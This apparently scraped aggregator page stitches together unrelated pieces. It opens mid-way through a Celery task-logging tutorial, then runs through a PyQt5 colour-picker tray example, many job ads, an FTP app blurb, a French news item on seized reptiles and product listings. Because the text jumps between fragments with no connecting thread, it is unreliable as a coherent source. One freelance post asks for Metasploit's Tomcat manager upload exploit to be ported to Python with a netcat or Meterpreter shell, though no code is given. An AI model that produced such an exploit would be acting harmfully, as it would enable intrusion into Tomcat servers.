[2018-11-06 07:30:13,598: INFO/MainProcess] Task tasks.get_request[9c332222-d2fc-47d9-adc3-04cebbe145cb] succeeded in 0.052071799989789724s: None

If your Celery application processes many tasks, the celery.task logger is almost indispensable to make sense of your log output. Compare this to the log message generated by the standard logging.getLogger:

[2018-11-06 07:33:16,140: INFO/MainProcess] Received task: tasks.get_request[7d2ec1a7-0af2-4e8c-8354-02cd0975c906]
[2018-11-06 07:33:16,140: INFO/MainProcess] Add: 3 + 5 = 8
[2018-11-06 07:33:16,193: INFO/MainProcess] Task tasks.get_request[7d2ec1a7-0af2-4e8c-8354-02cd0975c906] succeeded in 0.052330999984405935s: None

How to customise the celery.task log format

How do you customise the celery.task log message format? Remember how you customise the Celery logger using the after_setup_logger signal? There is a similar signal for the celery.task logger. The after_setup_task_logger signal gets triggered as soon as Celery worker has set up the celery.task logger. This is the signal we want to connect to in order to customise the log formatter.

There is one gotcha: In order to get access to task_id and task_name, you have to use celery.app.log.TaskFormatter instead of logging.Formatter. celery.app.log.TaskFormatter is an extension of logging.Formatter and gets a reference to the current Celery task at runtime (check out the source code if you want to take a deeper dive).

# worker.py
import os
from celery import Celery
from celery.signals import after_setup_task_logger
from celery.app.log import TaskFormatter


app = Celery()


@after_setup_task_logger.connect
def setup_task_logger(logger, *args, **kwargs):
    for handler in logger.handlers:
        handler.setFormatter(TaskFormatter('%(asctime)s - %(task_id)s - %(task_name)s - %(name)s - %(levelname)s - %(message)s'))

How to get the task_id using the standard logger?

The celery.task logger works great for anything which is definitely a Celery task. But what about lower-level code? Models, for example, are usually used both in a Celery and non-Celery context. If your front-of-the-house is a Flask web application, your models can be used either in the Flask or Celery process.

# models.py
import logging

from passlib.hash import sha256_crypt
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import validates
from sqlalchemy import text
from . import db


logger = logging.getLogger(__name__)


class User(db.Model):
    __tablename__ = 'users'
    id = db.Column(UUID(as_uuid=True), primary_key=True, server_default=text("uuid_generate_v4()"))
    name = db.Column(db.String(64), unique=False, nullable=True)
    email = db.Column(db.String(256), unique=True, nullable=False)

    @validates('email')
    def validate_email(self, key, value):
        logger.info(f'Validate email address: {value}')
        if value is not None:
            assert '@' in value
            return value.lower()

Your lower-level code should not care in which context it runs. You do not want to pollute it with a Celery-specific logger implementation. What you do want is to get the Celery task id in the log message when validate_email is called from within a Celery task. And no task id when validate_email is called from within Flask.

The good news is, you can do this with a simple trick. celery.app.log.TaskFormatter does the magic that injects task_id and task_name. It does so by calling celery._state.get_current_task. If celery._state.get_current_task is executed outside a Celery task, it simply returns None. When the task is None, celery.app.log.TaskFormatter handles this by printing ??? instead of the task_id and task_name. This means you can safely create your log handler outside Celery using celery.app.log.TaskFormatter.

import logging
from celery.app.log import TaskFormatter

logger = logging.getLogger()
sh = logging.StreamHandler()
sh.setFormatter(TaskFormatter('%(asctime)s - %(task_id)s - %(task_name)s - %(name)s - %(levelname)s - %(message)s'))
logger.setLevel(logging.INFO)
logger.addHandler(sh)

If you don’t like the ??? defaults or the fact that you have to import from celery.app.log, write your own custom task formatter.

import logging


class TaskFormatter(logging.Formatter):

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        try:
            from celery._state import get_current_task
            self.get_current_task = get_current_task
        except ImportError:
            self.get_current_task = lambda: None

    
    def format(self, record):
        task = self.get_current_task()
        if task and task.request:
            record.__dict__.update(task_id=task.request.id,
                                   task_name=task.name)
        else:
            record.__dict__.setdefault('task_name', '')
            record.__dict__.setdefault('task_id', '')
        return super().format(record)

logger = logging.getLogger()
sh = logging.StreamHandler()
sh.setFormatter(TaskFormatter('%(asctime)s - %(task_id)s - %(task_name)s - %(name)s - %(levelname)s - %(message)s'))
logger.setLevel(logging.INFO)
logger.addHandler(sh)

This custom TaskFormatter works with logging.getLogger. It imports celery._state.get_current_task if celery is present, otherwise not. If it runs inside a Celery worker process, it injects the task id and the task name, otherwise not. It just works.
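That fallback behaviour can be checked with nothing but the standard library. FallbackTaskFormatter below is a hypothetical, minimal re-implementation of the no-Celery branch, not Celery's own class:

```python
import io
import logging


class FallbackTaskFormatter(logging.Formatter):
    """Mimics the no-Celery branch: default the task fields to ''."""

    def format(self, record):
        record.__dict__.setdefault('task_name', '')
        record.__dict__.setdefault('task_id', '')
        return super().format(record)


# Capture log output in memory so we can inspect it.
stream = io.StringIO()
handler = logging.StreamHandler(stream)
handler.setFormatter(
    FallbackTaskFormatter('%(task_id)s|%(task_name)s|%(message)s'))

logger = logging.getLogger('demo')
logger.addHandler(handler)
logger.setLevel(logging.INFO)
logger.info('hello')

print(stream.getvalue())  # → ||hello  (empty task fields outside a worker)
```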


Catalin George Festila: Python Qt5 - QColorDialog example.
Today I will show you how to use the QColorDialog and the clipboard with PyQt5.
You can read the documentation on the official website.
This example uses a tray icon with an action for each type of color code.
The color code is put into the clipboard and printed to the shell.
I use two ways to get the color code:
  • parse the result of currentColor, depending on the type of color code;
  • get the color code with a dedicated function from QColorDialog;
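The color codes involved (hex, rgb and hsv strings) can be previewed without Qt at all. A small sketch using the standard library's colorsys, assuming Qt's 0-359 hue and 0-255 saturation/value ranges:

```python
import colorsys

r, g, b = 255, 128, 0  # an example orange

hex_code = "#%02x%02x%02x" % (r, g, b)
rgb_code = "rgb(%d, %d, %d)" % (r, g, b)

# colorsys works on 0-1 floats; Qt reports hue as 0-359 and
# saturation/value as 0-255, so rescale accordingly.
h, s, v = colorsys.rgb_to_hsv(r / 255, g / 255, b / 255)
hsv_code = "hsv(%d, %d, %d)" % (round(h * 359), round(s * 255), round(v * 255))

print(hex_code, rgb_code, hsv_code)
# → #ff8000 rgb(255, 128, 0) hsv(30, 255, 255)
```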
To select the color we want to use, we need the QColorDialog:

Let's see the source code:
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *

# create the application
app = QApplication([])
app.setQuitOnLastWindowClosed(False)

# get the icon file
icon = QIcon("icon.png")

# create clipboard
clipboard = QApplication.clipboard()
# create dialog color
dialog = QColorDialog()

# create functions to get parsing color
def get_color_hex():
    if dialog.exec_():
        color = dialog.currentColor()
        clipboard.setText(color.name())
        print(clipboard.text())

def get_color_rgb():
    if dialog.exec_():
        color = dialog.currentColor()
        clipboard.setText("rgb(%d, %d, %d)" % (
            color.red(), color.green(), color.blue()
        ))
        print(clipboard.text())

def get_color_hsv():
    if dialog.exec_():
        color = dialog.currentColor()
        clipboard.setText("hsv(%d, %d, %d)" % (
            color.hue(), color.saturation(), color.value()
        ))
        print(clipboard.text())

# create function to use getCmyk
def get_color_getCmyk():
    if dialog.exec_():
        color = dialog.currentColor()
        clipboard.setText("Cmyk(%d, %d, %d, %d, %d)" % (
            color.getCmyk()
        ))
        print(clipboard.text())

# create the tray icon application
tray = QSystemTrayIcon()
tray.setIcon(icon)
tray.setVisible(True)

# create the menu and add actions
menu = QMenu()
action1 = QAction("Hex")
action1.triggered.connect(get_color_hex)
menu.addAction(action1)

action2 = QAction("RGB")
action2.triggered.connect(get_color_rgb)
menu.addAction(action2)

action3 = QAction("HSV")
action3.triggered.connect(get_color_hsv)
menu.addAction(action3)

action4 = QAction("Cmyk")
action4.triggered.connect(get_color_getCmyk)
menu.addAction(action4)

action5 = QAction("Exit")
action5.triggered.connect(exit)
menu.addAction(action5)

# add the menu to the tray icon application
tray.setContextMenu(menu)

app.exec_()

Mid SOC Analyst - XOR Security - Fairmont, WV
(e.g., Splunk dashboards, Splunk ES alerts, SNORT signatures, Python scripts, Powershell scripts.). XOR Security is currently seeking talented Cyber Threat...
From XOR Security - Sat, 14 Jul 2018 02:06:16 GMT - View all Fairmont, WV jobs
Senior Python Developer / Team Lead - Chisel - Toronto, ON
Chisel.ai is a fast-growing, dynamic startup transforming the insurance industry using Artificial Intelligence. Our novel algorithms employ techniques from...
From Chisel - Mon, 22 Oct 2018 13:32:48 GMT - View all Toronto, ON jobs
          Senior Software Engineer - Python - Tucows - Toronto, ON      Cache   Translate Page      
Flask, Tornado, Django. Tucows provides domain names, Internet services such as email hosting and other value-added services to customers around the world....
From Tucows - Sat, 11 Aug 2018 05:36:13 GMT - View all Toronto, ON jobs
          Senior Software Developer - Integrity Resources - Kitchener-Waterloo, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. Our client overview:....
From Indeed - Wed, 10 Oct 2018 18:08:25 GMT - View all Kitchener-Waterloo, ON jobs
          Senior Software Developer - Encircle - Kitchener, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. We’re Encircle, nice to meet you!...
From Encircle - Mon, 15 Oct 2018 16:58:12 GMT - View all Kitchener, ON jobs
          Software Developer - Encircle - Kitchener, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. We’re Encircle, nice to meet you!...
From Encircle - Mon, 15 Oct 2018 16:58:12 GMT - View all Kitchener, ON jobs
          Senior Software Developer - Integrity Resources - Kitchener, ON      Cache   Translate Page      
Server Development - Tornado (Python), SQLAlchemy, and Postgresql. Our client Overview:....
From Integrity Resources - Wed, 10 Oct 2018 23:19:39 GMT - View all Kitchener, ON jobs
          Python Software Engineer - PageFreezer - British Columbia      Cache   Translate Page      
Experience using web framework such as Tornado with Python. Python Software Engineer....
From PageFreezer - Mon, 05 Nov 2018 06:09:49 GMT - View all British Columbia jobs
          Easy FTP Pro      Cache   Translate Page      
Category: Utilities
Latest version: 7.8
Size: 74.30 MB

Easy FTP Pro for iPhone and iPad offers all the features of a desktop client. Make changes to your website from anywhere!! Includes a text editor with color coding (html, php, perl, python...) and printing, an image and document viewer, ZIP, 7-Zip and RAR extraction, a web browser, an audio player, a video player (mp4, avi, ...), Dropbox, Google Drive, OneDrive, Box, Mega and WebDAV, and it also helps you access files on your remote computer (Mac, Windows, Linux), NAS servers, and more...

Video demo: http://www.youtube.com/user/jrmobileapps

Main Feature list:
√ Bookmarks: export and import them as an XML file, or import Filezilla bookmarks.
√ Support: FTP/FTPES/FTPS/SFTP.
√ Save and get pictures or videos from the Photo Library, also upload them directly to a server.
√ Includes text editor with color coding: html, perl, python...
√ Web Browser with multiple tabs, Bookmarks, Download files, Modify the type of browser detected...
√ WebDAV: download and upload files and folders, rename, create folders, view photos...
√ Dropbox, Google Drive, OneDrive, Box, Mega: Upload and download files and folders, rename, create folders, file sharing, view photos...
√ Computer shared files (SMB). Upload and download files, access with credentials, photo viewer...
√ Include a console to see the FTP commands sent and received from the server.
√ 3D touch support: Peek at documents, photos and Audio files, Quick Actions for FTP/SFTP bookmarks.
√ FXP: connect to two servers at a time and transfers files between them (some servers may not support it).
√ Support for Split-Screen Multitasking on iPad*
√ Search and open files from spotlight.
√ Support for PiP (Picture in Picture) when playing MP4 and MOV files on iPad*.
*some devices

• FTP
√ Support SSL/TLS over FTP (explicit or implicit mode). Support TLS session resumption.
√ Support list format in UNIX and Windows server.
√ Support file list with different text encodings.
√ Delete or create folders, delete folders with files and folders inside.
√ Download and Upload folders.
√ Search files and folders.
√ Set one or more files permission.
√ Support for PRET.
√ Send Commands.
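The UNIX list format mentioned above is the familiar `ls -l` layout. Here is a minimal sketch of how a client could parse one LIST line (the field layout is an assumption; real servers vary, which is why clients also handle Windows-style listings):

```python
import re

# Typical UNIX LIST line:
# "-rw-r--r--   1 owner  group   4096 Nov 06 12:30 index.html"
LIST_LINE = re.compile(
    r"^([-dl][rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+(\d+)\s+"
    r"(\w{3}\s+\d{1,2}\s+[\d:]{4,5})\s+(.+)$"
)

def parse_unix_list_line(line):
    """Return a dict for one UNIX-style LIST line, or None if the
    line does not match the assumed layout."""
    m = LIST_LINE.match(line)
    if m is None:
        return None
    perms, owner, group, size, mtime, name = m.groups()
    return {
        "is_dir": perms[0] == "d",
        "permissions": perms,
        "owner": owner,
        "group": group,
        "size": int(size),
        "mtime": mtime,
        "name": name,
    }

entry = parse_unix_list_line(
    "-rw-r--r--   1 owner  group   4096 Nov 06 12:30 index.html"
)
print(entry["name"], entry["size"])  # → index.html 4096
```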

• SFTP
√ Browse, upload, download, delete and rename from any SFTP server.
√ Download, upload, delete or create folders.
√ Search files and folders.
√ Set one or more files permission.
√ Send SSH Commands.

• Viewers
√ Word, Excel, PowerPoint, Numbers, Pages, and documents: rtf, txt, c, h...
√ PDF viewer with paging, zoom, bookmarks, page preview...
√ Includes an image viewer and image editor with zoom and tools to crop, resize, and rotate.
√ Audio Player that displays the cover, also artist, title, genre and album.
√ Video player that supports: avi, divx, xvid, wmv, mpg, mkv, flv, mov, mp4, m4v, 3gp. Supports SRT subtitle files and audio track selection.

• Compression tools
√ Unzip zip and 7zip files, also password protected files.
√ Make new ZIP archives with the stored files.
√ Decompress RAR files, including multipart and password protected files.
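The ZIP side of this can be sketched with Python's standard zipfile module; an in-memory buffer stands in for the app's stored files (RAR and 7-Zip need third-party libraries, so they are left out here):

```python
import io
import zipfile

# Create an archive in memory...
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
    zf.writestr("notes/readme.txt", "hello from the archive")

# ...then read it straight back: the same round trip as
# "make new ZIP archives" followed by "unzip".
buf.seek(0)
with zipfile.ZipFile(buf) as zf:
    names = zf.namelist()
    text = zf.read("notes/readme.txt").decode("utf-8")

print(names)  # → ['notes/readme.txt']
print(text)   # → hello from the archive
```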

• Text Editor
√ Supports 30 different text encodings, also auto-detect encoding.
√ Newline character management, auto-detect included: Windows or Linux/MAC/UNIX.
√ Color coding and printing.
√ Ability to edit text files from the server with the editor and re-upload your changes.
√ Unknown files can be opened as text.
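The newline auto-detection described above can be sketched as a simple count of the three conventions, keeping whichever dominates (a simplified heuristic, not the app's actual implementation):

```python
def detect_newline(data: bytes) -> str:
    """Guess the dominant newline convention in raw file bytes:
    Windows CRLF, UNIX LF, or classic Mac CR."""
    crlf = data.count(b"\r\n")
    lf = data.count(b"\n") - crlf  # bare LFs only
    cr = data.count(b"\r") - crlf  # bare CRs only
    count, newline = max((crlf, "\r\n"), (lf, "\n"), (cr, "\r"))
    return newline if count else "\n"  # default to LF for empty input

print(repr(detect_newline(b"a\r\nb\r\n")))  # → '\r\n'
print(repr(detect_newline(b"a\nb\n")))      # → '\n'
```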

• File Manager
√ Open, Rename, Move, Delete, Create Folder, sort files,...
√ Displays thumbnail of images, video, and song’s covers.
√ Supports downloading attachments from mail app.
√ App can Save and Open files with other apps.

• Sharing
√ Share access to the stored files from a web browser, also upload files.
√ FTP server.
√ You can protect the access with a password.
√ USB File Sharing via iTunes.
√ Email Files as Attachments.

• Other Features
√ A pin code, pattern or Touch ID can be set to restrict the access to the application.

For more details visit: www.jrmobileapps.com
Twitter: @jrmobileapps
Facebook: JR mobile Apps
Youtube: jrmobileapps

          Systems Automation Engineer      Cache   Translate Page      
TX-Plano, 2+ years' experience with Public Cloud environments utilizing Linux Strong experience with monitoring and logging tools (ELK, AppDynamics, Dynatrace, DataDog, Nagios, etc) Some scripting/automation experience (Bash, Python, PowerShell, etc) Fundamental understanding of modern cloud architecture (VMs, Database, message queues) Understanding of Web Services technologies (REST, SOAP) Great troubleshooting
          Data scientist      Cache   Translate Page      
Looking for someone to contribute to an ongoing project as a data analyst. You are expected to have experience with machine learning and deep learning modules using Python. A minimum of 4 hours a day needs to be spent on the project... (Budget: ₹100 - ₹400 INR, Jobs: Data Mining, Machine Learning, Python, Software Architecture, Statistics)
          Arras: 311 animals seized at Reptile Day      Cache   Translate Page      

On Sunday, reptile enthusiasts gathered for Reptile Day in Saint-Laurent-Blangy, near Arras, in the Pas-de-Calais. They were not expecting to find agents of the ONCFS, who were also on site... but not for the same reasons! The agents seized 311 specimens covering forty species, some so rare that their value is unknown. Snakes, chameleons, tortoises and spiders were confiscated because they were not authorised for sale.

Sanctions under way 

Sanctions and judicial proceedings have been brought against the sellers, with six major cases opened against the offenders. They are accused of holding neither certificates of competence nor permits to open an establishment. The sellers were all foreign nationals: Belgian, Hungarian, Dutch and English. 

With the rise of new companion animals (NAC), the ONCFS has had to adapt to the resulting abuses. So which species are the agents looking for? Ismaël Costa, head of the CITES brigades in France (Convention on International Trade in Endangered Species of Wild Fauna and Flora), answers the question.

"The world of animal keeping has grown considerably, and it needs oversight. We come to check that species banned from sale are not being sold." 

The agents focus first on dangerous and invasive species, such as Florida pond slider turtles or certain snakes. One example is the reticulated python, a dangerous snake that requires a special permit. As for frogs, some can produce venomous or even hallucinogenic substances at a mere touch. 


          Jimmy Choo JC121 Glasses in Havana Python      Cache   Translate Page      
Jimmy Choo JC121 Glasses in Havana Python

Frame Colour: Havana Python
Lens Colour: Clear
Lens Size: 52
Filter Category: 0
Total UV Protection


          Custom payload script metasploit      Cache   Translate Page      
Hello, I need the Metasploit payload exploit/multi/http/tomcat_mgr_upload to be in Python (with a simple shell like netcat or Meterpreter) (Budget: €8 - €30 EUR, Jobs: Java, Linux, Python, Software Architecture, Ubuntu)
          Odoo System Development      Cache   Translate Page      
I want to generate a custom monthly invoice (QWeb) in the Payroll module, and this invoice must depend on some custom fields (Budget: $30 - $250 USD, Jobs: ERP, Python)
          #6: Learning Python: Powerful Object-Oriented Programming      Cache   Translate Page      
Learning Python
Learning Python: Powerful Object-Oriented Programming
Mark Lutz
(29)

Buy new: CDN$ 39.49

(Visit the Bestsellers in Web Development list for authoritative information on this product's current rank.)
          #10: Programming: C ++ Programming : Programming Language For Beginners: LEARN IN A DAY! (C++, Javascript, PHP, Python, Sql, HTML, Swift)      Cache   Translate Page      
Programming
Programming: C ++ Programming : Programming Language For Beginners: LEARN IN A DAY! (C++, Javascript, PHP, Python, Sql, HTML, Swift)
Os Swift

Buy new: CDN$ 2.99

(Visit the Bestsellers in Web Development list for authoritative information on this product's current rank.)
          Integrations Specialist - OnShift, Inc - Cleveland, OH      Cache   Translate Page      
Experience with Microsoft Server and Task Scheduler a plus. Advanced troubleshooting using SQL, Python, and advanced Excel is highly desired....
From OnShift, Inc - Thu, 20 Sep 2018 16:25:59 GMT - View all Cleveland, OH jobs
          (USA-CA-Los Angeles) Sr Product Manager - eCommerce/Startup      Cache   Translate Page      
Sr Product Manager - eCommerce/Startup Sr Product Manager - eCommerce/Startup - Skills Required - Product Management, Product Strategy, ECommerce, Team Leadership & Management, Data Analysis, Agile, Startup, SQL, Python If you are a Senior Product Manager with at least 5 years of eCommerce & Startup experience, read on! Based out of Los Angeles, we are a company focused on improving the well being of our customers and women everywhere. Our revolutionary products are on track to disrupt a billion dollar industry & we want people committed to creating positive change and making a difference to join our team. **Top Reasons to Work with Us** 1. Get in on the ground floor of a fast-growing startup! 2. We are committed to making a difference & our culture reflects that! 3. Work with a team that values individual ideas & collaboration! **What You Will Be Doing** As Senior Product Manager, you will be responsible for developing & driving product strategy, overseeing product roadmap, collaborating with and leading cross-functional teams with focus on using data-driven strategies and research methods to improve overall user experience & help optimize product. **What You Need for this Position** A Bachelor's Degree and more than 5 Years of experience and knowledge of: - Product Management - Product Strategy - ECommerce - Team Leadership & Management - Data Analysis - Agile Bonus points if you have experience with: - Startups - SQL - Python **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k - Equity So, if you are a Senior Product Manager with at least 5 years of experience, apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. 
**Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Sr Product Manager - eCommerce/Startup* *CA-Los Angeles* *ZC1-1492862*
          (USA-VA-Herndon) Full Stack Scala Engineer: JavaScript | Responsive Web Apps      Cache   Translate Page      
Full Stack Scala Engineer: JavaScript | Responsive Web Apps Full Stack Scala Engineer: JavaScript | Responsive Web Apps - Skills Required - JavaScript, Scala, Responsive Web Apps, Math, Modeling, JVM, Python, SPARK, Angular, Liftweb If you're an experienced Full Stack Scala Engineer, please read on! We apply artificial intelligence to solve complex, real-world problems at scale. Our Human+AI operating system, blends capabilities ranging from data handling, analytics, and reporting to advanced algorithms, simulations, and machine learning, enabling decisions that are just-in-time, just-in-place, and just-in-context. If this type of environment sounds exciting, please read on! **Top Reasons to Work with Us** - Benefits start on day 1 - Free onsite gym - Unlimited snacks and drinks - Located 1 mile from Wiehle-Reston East Station on the Silver line **What You Will Be Doing** RESPONSIBILITIES: - Design and develop code, predominantly in Scala, making extensive use of current tools such as Liftweb and Scala.js. 
- Developing state-of-the-art analytics tools supporting diverse tasks ranging from ad hoc analysis to production-grade pipelines and workflows for customer applications - Contributing to key user interactions and interfaces for tools across our modular SaaS platform - Developing tools to improve the ease of use of algorithms and data science tools - Working collaboratively to ensure consistent and performant approaches for the entire user experience and analytic code developed inside the system - Interacting directly with client project team members and operational staff to support live customer deployments **What You Need for this Position** QUALIFICATIONS: - Bachelor's Degree - Expert knowledge of Scala - Experience on full-stack software development teams - Expert knowledge of Javascript, HTML and CSS - Experience with responsive web applications - Experience with tools including Scala.js, Grunt, Bower, Liftweb - Advanced mathematical modeling skills - Experience with Akka, Akka HTTP, and Spark **What's In It for You** - Competitive Salary - Incentive Stock Options - Medical, Dental & Vision Coverage - 401(K) Plan - Flexible “Personal Time Off (PTO) Plan - 10+ Paid Holiday Days Per Year So, if you're an experienced Full Stack Scala Engineer, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Full Stack Scala Engineer: JavaScript | Responsive Web Apps* *VA-Herndon* *WT1-1492870*
          Python Programmer Needed      Cache   Translate Page      
Need a Python programmer for the long term. New freelancers are most welcome. (Budget: $30 - $250 USD, Jobs: Java, Javascript, Programming, Python, Software Architecture)
          (USA-NM-San Jose) Sr. Validation Engineer      Cache   Translate Page      
Sr. Validation Engineer Sr. Validation Engineer - Skills Required - Validation / System Testing, Python, Shell, Perl, Automation Testing, I/o Testing, Windows / Linux, RTOS, Network Package Capture and Analysis Tools, Version Control If you are a Sr. Validation Engineer with system testing experience, please read on! Located in beautiful San Jose, CA, we are a global company that is developing revolutionary tech in the autonomous and electric vehicle space. We are incredibly well-funded and are seeing continued growth and investments, everyone wants a piece of this pie! We employ the newest technologies and methodologies when developing self-driving cars. Due to our incredible growth, we are in need of a Sr. Validation Engineer to join our team of elite engineers. **What You Will Be Doing** - Develop automation stations, tools and techniques in order to improve test coverage - Hardware and Software subsystem testing - Find critical gaps, create solutions for continuous integration - Improve operating efficiency - Create and maintain test plans, test reports, and test dashboards - Interacting with internal development and product teams to influence testability of the product - Testing and debugging complex product configurations - Mentor and train others in validation **What You Need for this Position** - 5+ years in a Validation or System Test Engineer role - BSCS or BSEE or related - Quality Assurance - Strong Scripting skills (Python, Shell, Perl, etc.) - Automation Testing (designing frameworks) - I/O, Hardware, and Software testing - Experience testing in Windows / Linux / Android / RTOS - Network Package Capture and Analysis Tools (Wireshark) - Version Control Nice to have: - QNX - CANoe - CAN - Experience with testing in Automotive industry - Vehicle Network **What's In It for You** - Competitive Salary - Great Benefits - Generous PTO - Much more! So, if you are a Sr. Validation Engineer - QA with experience, please apply today! 
Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Sr. Validation Engineer* *NM-San Jose* *TR3-1493038*
          (USA-NJ-Princeton) Data Analyst      Cache   Translate Page      
Data Analyst Data Analyst - Skills Required - Data Analysis, Python, SQL, C/C++, Statistical Software (R/Python/SAS/SPSS/SQL), Python/R, Data Analyst, Excel, Matlab, SPSS If you are a Data Scientist with experience, please read on! Located in Princeton, NJ, our leaders have been in the industry for over 30 years. We have created a platform that assists companies both large and small by analyzing consumer behavior and improving marketing tactics. **What You Will Be Doing** -Extracting and analyzing data and creating reports -Searching our large database to create customer prospecting models -Statistical modeling and regression analysis **What You Need for this Position** - Master's Degree in Statistics, Marketing Analytics, or related field STRONGLY preferred, Bachelor's Degree required - 3+ years practical experience with statistical analysis, and/or marketing/business analytics - Python - SQL - C/C++ - Excel - Matlab - SPSS **What's In It for You** - Competitive salary ($75K-$110K DOE) - Excellent benefits package, 401k, PTO, and an FSA - Located near public transit - Opportunity to grow within the team So, if you are a Data Scientist with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Data Analyst* *NJ-Princeton* *TK3-1492884*
          Web scraping 3 sites      Cache   Translate Page      
Hello, I have 3 sites to automate. Need an expert on scraping to automate some steps, with the ability to work on Linux and Windows, saving data to text files and showing process statistics for each process (Budget: $10 - $100 USD, Jobs: Data Mining, Linux, Python, Software Architecture, Web Scraping)
          Working Student (m/f/d) Software Development for the Innovation Department      Cache   Translate Page      
Job offer: More information and applications at: https://www.campusjaeger.de/jobs/8583?s=18111178+ What can you expect? * You will be fully integrated into our team. * You will work in a team with experienced colleagues who are happy to advise you. * You will work in a creative office space in a Baden-Baden period building. * You will come into contact with a wide range of topics and technologies.+ What should you bring? * You are studying computer science, business informatics or mathematics. * You have basic programming skills; for example Java, Python, SQL or JavaScript would be ... 0 comments, read 38 times.
          (USA-WA-Seattle) Senior Software Engineer      Cache   Translate Page      
Senior Software Engineer Senior Software Engineer - Skills Required - AWS, Python, SaaS, Distributed Systems If you are a Senior Software Engineer with experience, please read on! Based in downtown Seattle, we are a progressive technology company that specializes in SaaS, brand compliance, and paid search monitoring. If you are interested in joining an exciting company that pushes the envelope in the SaaS industry, encourages continuous growth and learning for our employees, and definitely cares about providing a great and collaborative working environment for its employees, then please apply today! **Top Reasons to Work with Us** - Competitive salary - 401K w/ company match - Stock and ownership opportunities!! - Competitive Benefits (Medical, Dental, Vision) - Unlimited PTO/Vacation days - Flexible work schedule and hours - Option to work from home 1-2 days a week - Opportunity to learn new technologies and skills - Work in a fun, collaborative, and employee-centered environment - Have the opportunity to make an impact and have a say in the company - Orca pass **What You Will Be Doing** - Tackle complex data storage and access problems - Mentor engineers under you - Work in a collaborative team setting - Collect and filter data - Code using Python - Use distributed systems and AWS - Perform data scaling tasks **What You Need for this Position** - 5+ years of professional experience - AWS - SaaS - Distributed Systems - Python STRONGLY preferred **What's In It for You** - Competitive salary - UNLIMITED VACATION - Medical - Dental - Vision - Stock/Equity options - Work from home 1-2 times/week - Growth opportunities - 401k - Life insurance So, if you are a Senior Software Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. 
**CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Software Engineer* *WA-Seattle* *ST3-1493001*
          (USA-TX-Austin) Robotics Application Engineer - PLC, C++, Python      Cache   Translate Page      
Robotics Application Engineer - PLC, C++, Python Robotics Application Engineer - PLC, C++, Python - Skills Required - PLC, C++, Python, ROS, Gazebo, Vrep, Linux, Bash If you are a Robotics Application Engineer with experience, please read on!( Austin, TX) The Application Systems Engineer acts as a customer facing engineer and an automation technical consultant to Stocked Robotics customers, and is responsible for determining requirements, product selection, customer operational recommendations, running on-site deployments and integrating SIERA AI into customer workflows. **Top Reasons to Work with Us** -Health, Dental, Vision and Life Insurance -Generous vacation and sick leave policy -Unlimited soda, snacks and coffee -Pizza Friday socials -Company BBQs around our beautiful city of Austin! **What You Will Be Doing** - Understand customer needs for future feature developments, generate requirements documents, and drive to completion among application engineering, product management and engineering teams - Develop, document, and implement applications for Stocked Robotics customers - Develop clear and concise proposed description of non-recurring engineering labor and materials for special customer requests - Prepare diagrams and simulations for cross-disciplinary communication of proposed systems - Support sales staff with the determination of customer requirements and automated material handling solutions using Stocked Robotics products - Travel to customer sites as needed (20-30%) to study and gather information critical to the overall system - Determine external control requirements for proposed vision guided vehicle systems (i.e. WMS, WCS, MES, etc.) 
- Propose and prototype PLC logic and integration **What You Need for this Position** - 3+ years work experience - Proficiency in Linux, Bash, Robot Operating System - Proficiency in C++ & Python with at least 3+ years of experience, ROS / Gazebo / VREP simulation experience a plus - Excellent written and oral communication skills - Demonstrated ability to evaluate customer needs and problems and translate them into comprehensive sales proposal materials - Self-starter who works well in high pressure situations **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k So, if you are a Robotics Application Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Robotics Application Engineer - PLC, C++, Python* *TX-Austin* *SL5-1492779*
          (USA-CA-San Jose) Lead Machine Learning Software Engineer - up to 220k + bonus      Cache   Translate Page      
